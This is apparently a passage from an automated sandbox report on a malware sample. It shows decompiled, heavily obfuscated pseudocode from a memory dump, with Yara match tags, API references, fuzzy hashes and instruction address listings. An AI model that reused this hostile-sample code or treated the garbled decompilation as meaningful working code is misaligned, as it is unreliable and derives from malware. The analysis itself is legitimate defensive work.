				L00418DB0(_t10, _a4, _a4 + 0xc7c,  *((intOrPtr*)(_t5 + 0xa14)), 0, 0x36);
				ExitProcess(_a8);
			}




                                                        0x00418503
                                                        0x0041851a
                                                        0x00418528

                                                        APIs
                                                        • ExitProcess.KERNEL32(?,?,00000000,?,?,?), ref: 00418528
                                                        Memory Dump Source
                                                        • Source File: 0000000A.00000002.373559944.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                        Yara matches
                                                        Similarity
                                                        • API ID: ExitProcess
                                                        • String ID:
                                                        • API String ID: 621844428-0
                                                        • Opcode ID: caa18f4ccbf82a939ed7a560578cfa8cb4ed60065234b72d20cd43f227523b36
                                                        • Instruction ID: 9f62bdc44f65d7d9a2483e28fb075f3ff631dd5cfbab79109080827007e6cc43
                                                        • Opcode Fuzzy Hash: caa18f4ccbf82a939ed7a560578cfa8cb4ed60065234b72d20cd43f227523b36
                                                        • Instruction Fuzzy Hash: 62D012716003147BD620DF99DC85FD7779CDF49750F018069BA1C5B241C931BA0086E5
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Non-executed Functions

                                                        Function 0041BB26, Relevance: 1.8, Strings: 1, Instructions: 571COMMONCrypto
                                                        Download Yara Rule
                                                        C-Code - Quality: 54%
                                                        			E0041BB26() {
				signed int _t92;
				signed int _t102;
				signed int _t107;
				signed char _t108;
				void* _t110;
				signed char _t111;
				intOrPtr _t117;
				signed char _t120;
				signed char _t121;
				signed int _t125;
				signed int _t131;
				signed int _t135;
				signed int _t136;
				signed int _t139;
				signed int _t140;
				signed int _t147;
				signed int _t156;
				void* _t158;
				signed int _t159;
				signed int _t160;
				intOrPtr _t176;

				asm("adc dl, [0x5b3abab5]");
				_t111 = _t110 - 1;
				if(_t111 >= 0) {
					__ecx = __ecx |  *0x40742f72;
					_t46 = __dh;
					__dh =  *0x54149b1a;
					 *0x54149b1a = _t46;
					__eax = __eax + 1;
					__edx =  *0x597c2e6a * 0xc68e;
					 *0x6fd85d9 =  *0x6fd85d9 ^ __ebx;
					_pop(__ebx);
					__dh =  *0x54149b1a | 0x00000086;
					_t47 = __ah;
					__ah =  *0xd813410c;
					 *0xd813410c = _t47;
					asm("adc edi, [0xa9b9e5ec]");
					L1();
					__edi = __edi + 0xc79850e8;
					L1();
					__ebp = __ebp &  *0xc20707e8;
					__ebp = __ebp - 1;
					asm("sbb eax, [0x5bf5dc16]");
					 *0x11bc3333 =  *0x11bc3333 << 0xdf;
					if( *0x11bc3333 < 0) {
						__esi = __esi -  *0x42b00979;
						__bl = __bl |  *0xeab4c00a;
						 *0x110ac01f =  *0x110ac01f + __ecx;
						_push(__edx);
						__cl = __cl ^ 0x0000001c;
						asm("rol byte [0x28a85ce2], 0x56");
						if(__cl >= 0) {
							asm("sbb edx, [0xf8257370]");
							__esi = __esi -  *0xf4be9323;
							 *0xe7059f8e = __ecx;
							__ebx = __ebx & 0x95a340c0;
							__cl = __cl | 0x000000a2;
							__ecx = __ecx |  *0x7baa6335;
							 *0x7b61169b =  *0x7b61169b & __ebp;
							 *0x1027d722 =  *0x1027d722 << 0x97;
							__cl = 0xb0;
							__eax =  *0x76296f6b * 0x845a;
							asm("ror byte [0x7383e380], 0x8d");
							 *0x5454a1d6 =  *0x5454a1d6 & __ebx;
							_pop( *0x17e67a6d);
							 *0xf5e230dd =  *0xf5e230dd << 0x3f;
							__eax =  *0x76296f6b * 0x0000845a |  *0x76d2d66e;
							_t52 = __esp;
							__esp =  *0xc17425d3;
							 *0xc17425d3 = _t52;
							asm("rcr dword [0xb144f568], 0x62");
							asm("adc bl, 0xc");
							__esp =  *0xc17425d3 ^  *0xfb5833f;
							__ebp = __ebp -  *0x4707bf09;
							 *0x2168ed96 =  *0x2168ed96 << 0x23;
							 *0xa6112d04 =  *0xa6112d04 >> 0x75;
							asm("sbb [0x10e227bd], esi");
							if( *0x2168ed96 <= 0 && ( *0xd7766f77 & __ecx) == 0) {
								__esp =  *0xc7af7875;
								asm("rcl dword [0xf5fee58e], 0xfe");
								asm("stosd");
								asm("adc [0x2c57e088], ah");
								asm("rcr byte [0xcd6b7d8a], 0x38");
								_push( *0x86f5fa2d);
								__esp =  *0xc7af7875 &  *0x4b33f561;
								__edx = __edx | 0xa5958394;
								__esi = __esi - 1;
								_pop(__edi);
								 *0x112cc0f1 =  *0x112cc0f1 >> 0x17;
								__esi = __esi -  *0xb136c207;
								__esp =  *0x645e0337;
								asm("sbb cl, 0xe5");
								__bh = __bh |  *0x72a09de1;
								asm("adc edx, [0x7565eed6]");
								__edi = __edi |  *0x5d12819;
								__edx = 0xbc47329b;
								__esp =  *0x8b1a4ba;
								__ebx = __ebx &  *0xccb0037;
								asm("scasb");
								__eax =  *0x11dd5c29;
								 *0xc863e6c7 =  *0xc863e6c7 >> 0x28;
								_push(__esi);
								asm("sbb cl, 0xe0");
								 *0x5ebbff4 =  *0x5ebbff4 | __ecx;
								__eax =  *0x11dd5c29 + 1;
								__dh = __dh &  *0x45163c3c;
								__edx = 0xbc47329b &  *0x937c91bb;
								if(0xbc47329b < 0) {
									_t61 = __ebx;
									__ebx =  *0xd1faef71;
									 *0xd1faef71 = _t61;
									asm("sbb ebp, [0x3b1dfb1e]");
									__ebx =  *0xd1faef71 ^ 0x8f8d52c7;
									__ecx = __ecx ^  *0x8391705;
									__bl = __bl +  *0x81561e7;
									__esi =  *0x6a596069 * 0x1232;
									if(__esi > 0) {
										__ecx =  *0xbfb1b7c0;
										asm("rcr byte [0x10176210], 0x1b");
										 *0xdaedb1b0 =  *0xdaedb1b0 + __dh;
										__esi = __esi + 1;
										asm("rcl dword [0xbc5dd7d5], 0xdf");
										asm("scasb");
										 *0x85af39df =  *0x85af39df + __ebp;
										 *0x3f1c4c6c =  *0x3f1c4c6c & __ecx;
										asm("adc ebp, 0x150138d4");
										__ebp = __ebp +  *0xf8c2e116;
										__dl = __dl ^ 0x000000e6;
										__dl = __dl ^ 0x00000082;
										_push( *0x3e7a9421);
										if(__dl <= 0) {
											_t64 = __ebx;
											__ebx =  *0x41fdfd77;
											 *0x41fdfd77 = _t64;
											_push(__ecx);
											__eax = __eax +  *0x190adf85;
											__eax = __eax - 1;
											 *0x88baa5b1 =  *0x88baa5b1 & __bl;
											if( *0x88baa5b1 == 0) {
												_push( *0x446e2cfc);
												if(( *0x90796d98 & __eax) == 0) {
													 *0xae666a75 =  *0xae666a75 >> 0xd3;
													__ebx = __ebx ^  *0xd6da060e;
													_push( *0x2ac3beea);
													asm("ror dword [0x9edbfefa], 0x1a");
													__ecx = __ecx + 0x152c6717;
													 *0x66f12038 =  *0x66f12038 << 0xa7;
													 *0xcb8c0100 =  *0xcb8c0100 ^ __bh;
													__bh = __bh & 0x0000001a;
													__ah = __ah |  *0x4a968e00;
													 *0x98f2c15 =  *0x98f2c15 << 0x55;
													__esi = __esi |  *0x45d82597;
													asm("rcl dword [0x92bc0da9], 0x75");
													__ch = __ch + 0xa0;
													_push(__ebx);
													__bl = __bl |  *0x135755b1;
													 *0xba64bbc =  *0xba64bbc >> 0x39;
													__bl = __bl ^  *0x699964e5;
													 *0x835020ee =  *0x835020ee | __esp;
													__edi = 0x536f9233;
													__ebp = __ebp - 1;
													__ecx = __ecx | 0xeed5aa87;
													asm("adc eax, [0xc192b3d]");
													 *0x272c9c10 =  *0x272c9c10 >> 0x1c;
													if(__ecx >= 0x14752326) {
														__esi = __esi ^ 0x528d6170;
														asm("adc ebp, [0x6237cbde]");
														asm("sbb ecx, [0x9d3a3c96]");
														 *0x4c08fdc9 =  *0x4c08fdc9 ^ 0x000000b0;
														__cl = 0xffffffffffffffca;
														asm("rcl byte [0x18927a24], 0xba");
														_t73 = __ebp;
														__ebp =  *0x8fe76c1b;
														 *0x8fe76c1b = _t73;
														 *0xbd8b52e4 =  *0xbd8b52e4 - __bh;
														 *0x6e78d534 = __ah;
														__ebp =  *0x8fe76c1b +  *0xb9515ad1;
														__eax = __eax |  *0xcdc88206;
														 *0x1567accd = __eax;
														asm("lodsb");
														__esp =  *0xfbd086a * 0xbb77;
														__eax = __eax & 0xdd085df7;
														__ebp =  *0x8fe76c1b +  *0xb9515ad1 +  *0xa806a7f0;
														 *0xbc3413ff = __eax;
														__ebx = __ebx - 1;
														asm("cmpsb");
														asm("adc ch, [0x51070f10]");
														__edi = 0x536f9232;
														_t74 = __dh;
														__dh =  *0x747e0f18;
														 *0x747e0f18 = _t74;
														__ebx = __ebx + 1;
														asm("cmpsw");
														__esi = __esi - 1;
														__esp =  *0xfbd086a * 0x0000bb77 &  *0x54f4f9fd;
														asm("ror byte [0x91eb1d14], 0xf6");
														asm("adc [0x899cf2c9], ah");
														__esp = ( *0xfbd086a * 0x0000bb77 &  *0x54f4f9fd) - 1;
														 *0x11927a24 = __bl;
														__esi = __esi - 1;
														 *0xa252cd0f =  *0xa252cd0f >> 0xe7;
														__dl = __dl & 0x000000a8;
														 *0x11752326 = __ebx;
														asm("rcr byte [0x40324a20], 0xf9");
														asm("lodsd");
														__ebx = __ebx + 0x89e1d615;
														asm("sbb eax, [0xc50c7523]");
														__esp = ( *0xfbd086a * 0x0000bb77 &  *0x54f4f9fd) - 0x00000001 &  *0x9acc9c1e;
														asm("rcl dword [0xee3037fe], 0xd3");
														 *0xde860a2 =  *0xde860a2 - __dl;
														 *0x84b57b96 =  *0x84b57b96 >> 0x5e;
														__esp =  *0x67e5f7fc;
														__ebp =  *0x8fe76c1b +  *0xb9515ad1 +  *0xa806a7f0 +  *0x49821623;
														 *0x467e0d62 = __ebx;
														__ebp =  *0x81852d6a * 0x98e5;
														 *0x49821623 =  *0x49821623 - 0xbc47329b;
														 *0x92a40e62 =  *0x92a40e62 ^ __ebx;
														 *0x84aae8df =  *0x84aae8df & 0x536f9232;
														__esp =  *0x67e5f7fc &  *0xdbf0cadd;
														__ebx = __ebx |  *0x2c67179e;
														__bh = __bh ^  *0x3f05251a;
														asm("sbb edx, [0x53cb4c2f]");
														_push(__ecx);
														__eax = __eax - 1;
														asm("sbb [0x2b96f09d], edx");
														 *0x897a509e =  *0x897a509e & __esp;
														asm("adc [0xc4f10be3], bh");
														__esi = __esi + 1;
														__esp = __esp + 1;
														__dh =  *0x747e0f18 ^  *0xd5aa98c6;
														 *0xefd90ee =  *0xefd90ee << 0x10;
														 *0xd2ad2ec1 =  *0xd2ad2ec1 ^ __esp;
														asm("movsw");
														__cl = 0xffffffffffffffca &  *0xc4d17d10;
														__esi = __esi &  *0x67179edb;
														asm("adc edi, [0x3c73f627]");
														_push(__ebp);
														 *0x108347b3 =  *0x108347b3 << 0xd0;
														_push(0xbc47329b);
														_t91 = __esi;
														__esi =  *0x7069a095;
														 *0x7069a095 = _t91;
														0x4f968ecd = 0xe9c7848e;
														__ebp = __ebp +  *0x5f105496;
														__ebx = __ebx + 1;
														__esi =  *0x7069a095 | 0x11a4a737;
														__esp = __esp + 1;
														__ah = __ah | 0x00000002;
														_push( *0x7069a095 | 0x11a4a737);
													}
												}
											}
										}
									}
								}
							}
						}
					}
				}
				L1:
				asm("adc [0xa1201009], eax");
				asm("lodsb");
				asm("adc esi, [0x41fcfdee]");
				 *0x2966e1a0 =  *0x2966e1a0 >> 0xfc;
				asm("rol dword [0x60b61e96], 0x63");
				_t92 = _t92 + 0x63;
				_t140 = _t140 -  *0xddfd293;
				asm("sbb eax, [0xc377e319]");
				_t102 = (_t102 + 0x00000001 &  *0x8e8886d) + 1;
				asm("movsw");
				asm("adc edi, 0xb04da4b8");
				_pop(_t136);
				_t111 = _t111 -  *0xe83f0504 |  *0x96ee906c;
				_push(_t136);
				 *0xd0ce8b85 =  *0xd0ce8b85 >> 0x14;
				 *0x52211e10 =  *0x52211e10 + _t102;
				_t160 = (_t160 |  *0x100c626d) - 1;
				_t147 = 0x602580cb |  *0x546e2e31;
				asm("adc cl, [0x22c6a80a]");
				_t125 = _t125 + 0x00000001 ^ 0x689e1362 | 0x09fb999c;
				 *0x5c780ce6 =  *0x5c780ce6 >> 0x8f;
				if( *0x5c780ce6 >= 0) {
					_pop( *0x28ccce70);
					_t160 = _t160 +  *0x3430581;
					asm("stosd");
					_push( *0x1cef0afb);
					 *0x5fd7d6b2 =  *0x5fd7d6b2 & _t125;
					_t147 =  *0xe3e2139 ^  *0x4babdf0f;
					 *0x863362d5 =  *0x863362d5 >> 0x4d;
					 *0xbe3382ce =  *0xbe3382ce + _t102;
					_t136 = _t136 ^ 0x726a071e;
					asm("stosd");
					asm("rcl dword [0x2a6b2b1d], 0x39");
					 *0xefd7bf3c =  *0xefd7bf3c >> 7;
					 *0x86eb06a2 =  *0x86eb06a2 | _t125;
					 *0xa87013d3 =  *0xa87013d3 << 0x3e;
					_t111 =  *0x5103cce3;
					 *0x5103cce3 = (0xfb627fd6 |  *0x4ac6be16) - 0xe5;
					asm("adc esi, 0x991d8fec");
					asm("sbb esp, [0xfe80e711]");
					_t102 = _t102 -  *0xc90fefcb ^  *0x6335c8f7;
					 *0x2418b3b =  *0x2418b3b ^ _t92;
					asm("adc bl, 0xe1");
					if( *0x2418b3b > 0) {
						asm("sbb eax, [0x3bc21576]");
						_t102 = (_t102 & 0x000000b4) - 0x62266691;
						_t125 = _t125 -  *0xc2299e29;
						 *0x5457e8b7 =  *0x5457e8b7 - _t111;
						_t176 =  *0x5457e8b7;
						if(_t176 <= 0) {
							asm("adc esp, [0xfd9c7577]");
							_push( *0x26daa109);
							if(_t176 >= 0) {
								_t111 =  *0x7252dc7c * 0x4e84;
								if(_t111 == 0) {
									 *0xbe597375 = _t111;
									asm("lodsd");
									 *0xb34e9004 =  *0xb34e9004 << 0x37;
									_pop(_t117);
									 *0x86f2bb0a =  *0x86f2bb0a >> 0x95;
									 *0x5b854ad3 =  *0x5b854ad3 | _t92;
									_t147 = _t147 + 0x176c8cfe |  *0x6d7c473d;
									asm("ror byte [0x1712b5e4], 0x23");
									asm("sbb ah, 0x86");
									_t92 = _t92 |  *0x2c7e2e16;
									_pop(_t139);
									_t140 =  *0xd9047360 * 0x8540;
									_t111 =  *0x6d7536c9;
									 *0x6d7536c9 = _t117;
									_t125 =  *0x16e93069 * 0x7daf;
									_t136 = _t139 |  *0x3d23f50b;
									_t160 = _t160 |  *0x191be4f4;
									_t102 = _t102 -  *0xed22ebe0;
									asm("sbb ebp, 0x9c58a56d");
									if(_t102 < 0) {
										asm("adc esi, [0xec973479]");
										 *0xb0ae5d39 =  *0xb0ae5d39 - _t160;
										 *0x20edfae3 =  *0x20edfae3 + _t102;
										asm("sbb [0x9bb3b1b7], cl");
										 *0x50983c9 =  *0x50983c9 >> 0x82;
										_t156 = _t147 | 0x1c1afb96;
										asm("cmpsb");
										 *0x480b8167 =  *0x480b8167 | _t111 ^ 0x00000000;
										 *0xb336e120 =  *0xb336e120 | _t92;
										asm("adc esi, [0xabc3d18f]");
										asm("adc esp, [0x290bfdd5]");
										 *0xa6eb8bde =  *0xa6eb8bde << 0xde;
										_t140 = _t140 -  *0xabc2d281;
										asm("rcr dword [0x230efdd5], 0xdd");
										 *0x16a30e31 =  *0x16a30e31 ^ _t156;
										_t136 = _t136 + 1;
										 *0xb6243188 =  *0xb6243188 >> 0x6c;
										asm("rcl byte [0x33aef908], 0x68");
										 *0x5f8b9937 =  *0x5f8b9937 ^ _t125;
										asm("sbb dl, 0x34");
										 *0x2c5e4014 =  *0x2c5e4014 << 0x3f;
										asm("adc dh, 0x12");
										_t102 = _t102 &  *0x8c59df12;
										 *0xdd22dc86 =  *0xdd22dc86 ^ _t102;
										_t111 =  *0x2b2c9acf;
										asm("rol byte [0xbda624f2], 0xd6");
										asm("rcr dword [0xa3ea121d], 0x97");
										_t147 = _t156 - 1;
										_t125 = _t125 - 0x00000001 ^ 0x9ea3db3d;
										_t92 = (_t92 ^ 0x0000000a) +  *0xd1d4bca;
										asm("sbb eax, [0x73e36f0d]");
										asm("adc esi, 0xa4a34cc0");
										if(_t92 < 0) {
											asm("adc edi, [0x4a861273]");
											_t102 = _t102 ^ 0xa3b931cb;
											 *0x64814b10 =  *0x64814b10 - _t125;
											_t147 = _t147 &  *0xf307548e;
											_t17 = _t92;
											_t92 =  *0x7f3777a0;
											 *0x7f3777a0 = _t17;
											_pop(_t160);
											asm("rcr byte [0xddb5091a], 0xf7");
											 *0x32130a81 =  *0x32130a81 ^ _t102;
											_push(_t125);
											 *0xd58dad29 =  *0xd58dad29 << 0x12;
											_t111 = _t111 | 0x000000c9;
											 *0x8b17fbd3 =  *0x8b17fbd3 ^ _t160;
											_t140 = 0x3ca9198c +  *0x78c8c6b * 0x6a2d;
											_t125 = _t125 |  *0xcc18940d;
											if(_t125 == 0) {
												_t120 = _t111 + 1;
												 *0xbeb4ecd9 =  *0xbeb4ecd9 | _t120;
												 *0xbadafdf1 =  *0xbadafdf1 - 0x1fa92a7b;
												asm("stosd");
												asm("adc eax, [0x6dfe923d]");
												_t121 = _t120 ^ 0x00000022;
												asm("sbb ebx, [0x6b290011]");
												_t107 = _t102 +  *0x12839d1b;
												asm("stosd");
												_push(_t160);
												 *0x87312133 =  *0x87312133 + _t121;
												asm("adc [0x2b898fd5], esp");
												_push(_t107);
												 *0xb5bbdf0 =  *0xb5bbdf0 << 0xab;
												asm("sbb [0x5d343a3a], cl");
												 *0xcbecf632 =  *0xcbecf632 >> 0x65;
												 *0x2200f0c2 = 0x1fa92a7b;
												asm("rol byte [0x807a8838], 0x94");
												 *0x4b465516 =  *0x4b465516 << 0x4f;
												L1();
												_t131 =  *0x72eba03a;
												 *0x72eba03a =  *0xa7973af6;
												asm("sbb [0x336c880], bl");
												 *0xfd16fad2 =  *0xfd16fad2 + _t131;
												asm("sbb ebp, [0x654c663d]");
												_t111 = _t121 +  *0x6e788fec +  *0xe2732ccf - 1;
												 *0xbf02c004 =  *0xbf02c004 >> 0x47;
												asm("adc bh, [0xef8be9e3]");
												 *0x7192db2c =  *0x7192db2c << 0x48;
												_t158 = _t107;
												_t108 = _t107 ^  *0x7c1bd46c;
												_t160 = _t160 -  *0x6da73287 -  *0x64cda393;
												asm("adc ch, 0xe4");
												asm("sbb ecx, [0x11a8c467]");
												asm("adc [0xb11a7100], cl");
												 *0xe7269de1 =  *0xe7269de1 ^ _t108;
												_t25 = _t140 +  *0xa03fbd2f &  *0x523d0003;
												_t140 =  *0x79da4885;
												 *0x79da4885 = _t25;
												asm("rol dword [0x80276d9], 0xda");
												asm("rcr byte [0xeca4ffe0], 0x14");
												_push(_t158);
												_t159 = _t158 - 0xafb167eb;
												 *0x437ef68c =  *0x437ef68c << 0x98;
												_push(_t136);
												 *0x9817efb =  *0x9817efb >> 0x55;
												 *0x224475f8 =  *0xbe3eb26b * 0xc0d6;
												_push(_t159);
												_t102 = _t108 - 0xf9 -  *0x996081d2;
												asm("adc edi, [0x99053409]");
												_t147 = _t159 &  *0xdfdf02cc;
												 *0x19eed505 =  *0x19eed505 | 0x1fa92a7b;
												 *0xd505dfe7 = _t111;
												_t125 = _t131 ^  *0xbff0400b |  *0xdff43102;
												 *0x77c5b905 =  *0x77c5b905 << 0x2d;
												_t92 =  *0x224475f8 |  *0xad05dfe0;
												 *0xdfde73ba =  *0xdfde73ba << 6;
												 *0xac03dfee =  *0xac03dfee ^ _t92;
												if( *0x9a044024 > _t102) {
													asm("sbb esi, 0x444b1bb");
													 *0x44abc90c =  *0x44abc90c << 0x6f;
													_t160 = _t160 + 1;
													 *0xe605dffa =  *0xe605dffa | _t160;
													asm("adc bl, 0x32");
													_t140 = _t140 +  *0xf232082f;
													asm("adc ecx, [0x42e007df]");
													asm("sbb ebx, [0x5e711207]");
													 *0x1a45376f = 0x1fa92a7b;
													 *0x15d92807 =  *0x15d92807 & 0x1fa92a7b;
													_t45 = _t92 +  *0xa9c87704 - 1 +  *0x1a47426c;
													_t92 =  *0x81a5308;
													 *0x81a5308 = _t45;
													_t111 = 0xc;
													_push(0xc);
													_push(_t140);
													 *0xdb5e9cde =  *0xdb5e9cde + _t92;
													asm("sbb ebp, [0x4854868]");
													_t102 = _t102 ^  *0x414b008;
													asm("adc ah, [0x7017161a]");
													asm("sbb [0xd40e0804], dh");
													_t147 =  *0x3454c966;
													if(_t102 < 0) {
														asm("sbb eax, [0x51090479]");
														 *0xc12f572a =  *0xc12f572a >> 0xdf;
														asm("lodsd");
														asm("rol byte [0x816a24e5], 0x26");
														_t135 =  *0x3aca5609;
														_t102 =  *0x7941f960 * 0xa81;
														asm("adc bh, 0xca");
														asm("adc dl, 0xf2");
														_t125 = _t135 |  *0xad1c282d;
														asm("sbb ebx, [0xfbdaf411]");
														_pop( *0x458fc10b);
														asm("lodsd");
														 *0x9569553b =  *0x9569553b ^ _t136;
													}
												}
											}
										}
									}
								}
							}
						}
					}
				}
				goto L1;
			}
























                                                        0x0041bb26
                                                        0x0041bb2c
                                                        0x0041bb2d
                                                        0x0041bb33
                                                        0x0041bb39
                                                        0x0041bb39
                                                        0x0041bb39
                                                        0x0041bb3f
                                                        0x0041bb46
                                                        0x0041bb50
                                                        0x0041bb56
                                                        0x0041bb57
                                                        0x0041bb60
                                                        0x0041bb60
                                                        0x0041bb60
                                                        0x0041bb66
                                                        0x0041bb6c
                                                        0x0041bb71
                                                        0x0041bb77
                                                        0x0041bb7c
                                                        0x0041bb82
                                                        0x0041bb89
                                                        0x0041bb8f
                                                        0x0041bb96
                                                        0x0041bb9c
                                                        0x0041bba2
                                                        0x0041bbae
                                                        0x0041bbb4
                                                        0x0041bbb5
                                                        0x0041bbb8
                                                        0x0041bbbf
                                                        0x0041bbc5
                                                        0x0041bbcb
                                                        0x0041bbd7
                                                        0x0041bbdd
                                                        0x0041bbe9
                                                        0x0041bbec
                                                        0x0041bbf2
                                                        0x0041bbfe
                                                        0x0041bc05
                                                        0x0041bc07
                                                        0x0041bc11
                                                        0x0041bc1b
                                                        0x0041bc27
                                                        0x0041bc2d
                                                        0x0041bc34
                                                        0x0041bc3a
                                                        0x0041bc3a
                                                        0x0041bc3a
                                                        0x0041bc40
                                                        0x0041bc47
                                                        0x0041bc50
                                                        0x0041bc5c
                                                        0x0041bc62
                                                        0x0041bc69
                                                        0x0041bc70
                                                        0x0041bc76
                                                        0x0041bc88
                                                        0x0041bc8e
                                                        0x0041bc95
                                                        0x0041bc96
                                                        0x0041bca2
                                                        0x0041bca9
                                                        0x0041bcaf
                                                        0x0041bcbb
                                                        0x0041bcc7
                                                        0x0041bcc8
                                                        0x0041bcc9
                                                        0x0041bcd0
                                                        0x0041bcd6
                                                        0x0041bcdc
                                                        0x0041bcdf
                                                        0x0041bce5
                                                        0x0041bceb
                                                        0x0041bcf1
                                                        0x0041bcf6
                                                        0x0041bd08
                                                        0x0041bd0f
                                                        0x0041bd10
                                                        0x0041bd15
                                                        0x0041bd1c
                                                        0x0041bd1d
                                                        0x0041bd20
                                                        0x0041bd26
                                                        0x0041bd27
                                                        0x0041bd2d
                                                        0x0041bd33
                                                        0x0041bd39
                                                        0x0041bd39
                                                        0x0041bd39
                                                        0x0041bd3f
                                                        0x0041bd45
                                                        0x0041bd4b
                                                        0x0041bd51
                                                        0x0041bd57
                                                        0x0041bd61
                                                        0x0041bd6d
                                                        0x0041bd73
                                                        0x0041bd7a
                                                        0x0041bd80
                                                        0x0041bd81
                                                        0x0041bd88
                                                        0x0041bd89
                                                        0x0041bd8f
                                                        0x0041bd95
                                                        0x0041bd9b
                                                        0x0041bda7
                                                        0x0041bdaa
                                                        0x0041bdad
                                                        0x0041bdb3
                                                        0x0041bdb9
                                                        0x0041bdb9
                                                        0x0041bdb9
                                                        0x0041bdbf
                                                        0x0041bdc3
                                                        0x0041bdc9
                                                        0x0041bdca
                                                        0x0041bdd0
                                                        0x0041bde2
                                                        0x0041bdee
                                                        0x0041bdf4
                                                        0x0041bdfb
                                                        0x0041be01
                                                        0x0041be07
                                                        0x0041be0e
                                                        0x0041be14
                                                        0x0041be1b
                                                        0x0041be21
                                                        0x0041be24
                                                        0x0041be36
                                                        0x0041be3d
                                                        0x0041be43
                                                        0x0041be4a
                                                        0x0041be4d
                                                        0x0041be4e
                                                        0x0041be57
                                                        0x0041be5e
                                                        0x0041be64
                                                        0x0041be70
                                                        0x0041be76
                                                        0x0041be77
                                                        0x0041be8a
                                                        0x0041be90
                                                        0x0041be9d
                                                        0x0041bea3
                                                        0x0041bea9
                                                        0x0041beaf
                                                        0x0041beb5
                                                        0x0041bebb
                                                        0x0041bebe
                                                        0x0041bec5
                                                        0x0041bec5
                                                        0x0041bec5
                                                        0x0041becb
                                                        0x0041bed1
                                                        0x0041bed8
                                                        0x0041bede
                                                        0x0041bee4
                                                        0x0041bee9
                                                        0x0041beea
                                                        0x0041bef4
                                                        0x0041bef9
                                                        0x0041beff
                                                        0x0041bf04
                                                        0x0041bf05
                                                        0x0041bf06
                                                        0x0041bf0c
                                                        0x0041bf0d
                                                        0x0041bf0d
                                                        0x0041bf0d
                                                        0x0041bf2b
                                                        0x0041bf2c
                                                        0x0041bf2e
                                                        0x0041bf2f
                                                        0x0041bf3b
                                                        0x0041bf48
                                                        0x0041bf54
                                                        0x0041bf58
                                                        0x0041bf5e
                                                        0x0041bf5f
                                                        0x0041bf6c
                                                        0x0041bf75
                                                        0x0041bf7c
                                                        0x0041bf83
                                                        0x0041bf84
                                                        0x0041bf91
                                                        0x0041bf97
                                                        0x0041bf9d
                                                        0x0041bfa4
                                                        0x0041bfaa
                                                        0x0041bfb1
                                                        0x0041bfb7
                                                        0x0041bfbd
                                                        0x0041bfc3
                                                        0x0041bfcd
                                                        0x0041bfd3
                                                        0x0041bfd9
                                                        0x0041bfdf
                                                        0x0041bfe5
                                                        0x0041bfeb
                                                        0x0041bff1
                                                        0x0041bffd
                                                        0x0041c004
                                                        0x0041c005
                                                        0x0041c00b
                                                        0x0041c011
                                                        0x0041c017
                                                        0x0041c018
                                                        0x0041c019
                                                        0x0041c01f
                                                        0x0041c026
                                                        0x0041c02c
                                                        0x0041c02e
                                                        0x0041c034
                                                        0x0041c040
                                                        0x0041c049
                                                        0x0041c050
                                                        0x0041c05a
                                                        0x0041c05b
                                                        0x0041c05b
                                                        0x0041c05b
                                                        0x0041c067
                                                        0x0041c06c
                                                        0x0041c072
                                                        0x0041c073
                                                        0x0041c079
                                                        0x0041c07a
                                                        0x0041c07d
                                                        0x0041c07e
                                                        0x0041be9d
                                                        0x0041bdee
                                                        0x0041bdd0
                                                        0x0041bdb3
                                                        0x0041bd61
                                                        0x0041bd33
                                                        0x0041bc76
                                                        0x0041bbbf
                                                        0x0041bb96
                                                        0x0041b496
                                                        0x0041b496
                                                        0x0041b4af
                                                        0x0041b4b0
                                                        0x0041b4bc
                                                        0x0041b4d1
                                                        0x0041b4d8
                                                        0x0041b4e1
                                                        0x0041b4e8
                                                        0x0041b4ee
                                                        0x0041b4ef
                                                        0x0041b4f1
                                                        0x0041b4f7
                                                        0x0041b504
                                                        0x0041b50a
                                                        0x0041b50b
                                                        0x0041b518
                                                        0x0041b52a
                                                        0x0041b52b
                                                        0x0041b531
                                                        0x0041b53d
                                                        0x0041b543
                                                        0x0041b54a
                                                        0x0041b550
                                                        0x0041b556
                                                        0x0041b562
                                                        0x0041b56f
                                                        0x0041b575
                                                        0x0041b581
                                                        0x0041b587
                                                        0x0041b58e
                                                        0x0041b5a3
                                                        0x0041b5af
                                                        0x0041b5b6
                                                        0x0041b5c0
                                                        0x0041b5c7
                                                        0x0041b5cd
                                                        0x0041b5d4
                                                        0x0041b5d4
                                                        0x0041b5da
                                                        0x0041b5e0
                                                        0x0041b5e6
                                                        0x0041b5ec
                                                        0x0041b5f2
                                                        0x0041b5f5
                                                        0x0041b5fb
                                                        0x0041b604
                                                        0x0041b60a
                                                        0x0041b610
                                                        0x0041b610
                                                        0x0041b616
                                                        0x0041b61c
                                                        0x0041b622
                                                        0x0041b628
                                                        0x0041b62e
                                                        0x0041b638
                                                        0x0041b63e
                                                        0x0041b651
                                                        0x0041b658
                                                        0x0041b665
                                                        0x0041b666
                                                        0x0041b66d
                                                        0x0041b673
                                                        0x0041b679
                                                        0x0041b690
                                                        0x0041b693
                                                        0x0041b699
                                                        0x0041b69a
                                                        0x0041b6a4
                                                        0x0041b6a4
                                                        0x0041b6aa
                                                        0x0041b6b4
                                                        0x0041b6ba
                                                        0x0041b6c0
                                                        0x0041b6c6
                                                        0x0041b6cc
                                                        0x0041b6d2
                                                        0x0041b6d8
                                                        0x0041b6de
                                                        0x0041b6e4
                                                        0x0041b6ea
                                                        0x0041b6f1
                                                        0x0041b6f7
                                                        0x0041b6fb
                                                        0x0041b701
                                                        0x0041b707
                                                        0x0041b70d
                                                        0x0041b713
                                                        0x0041b71a
                                                        0x0041b720
                                                        0x0041b72a
                                                        0x0041b730
                                                        0x0041b731
                                                        0x0041b73e
                                                        0x0041b745
                                                        0x0041b74b
                                                        0x0041b74e
                                                        0x0041b755
                                                        0x0041b758
                                                        0x0041b75e
                                                        0x0041b764
                                                        0x0041b76a
                                                        0x0041b772
                                                        0x0041b779
                                                        0x0041b780
                                                        0x0041b78c
                                                        0x0041b792
                                                        0x0041b798
                                                        0x0041b79e
                                                        0x0041b7a4
                                                        0x0041b7b0
                                                        0x0041b7b6
                                                        0x0041b7c2
                                                        0x0041b7c8
                                                        0x0041b7c8
                                                        0x0041b7c8
                                                        0x0041b7ce
                                                        0x0041b7cf
                                                        0x0041b7e0
                                                        0x0041b7e6
                                                        0x0041b7e7
                                                        0x0041b7ee
                                                        0x0041b7f1
                                                        0x0041b7f7
                                                        0x0041b7fd
                                                        0x0041b803
                                                        0x0041b80e
                                                        0x0041b821
                                                        0x0041b827
                                                        0x0041b82d
                                                        0x0041b834
                                                        0x0041b83a
                                                        0x0041b83d
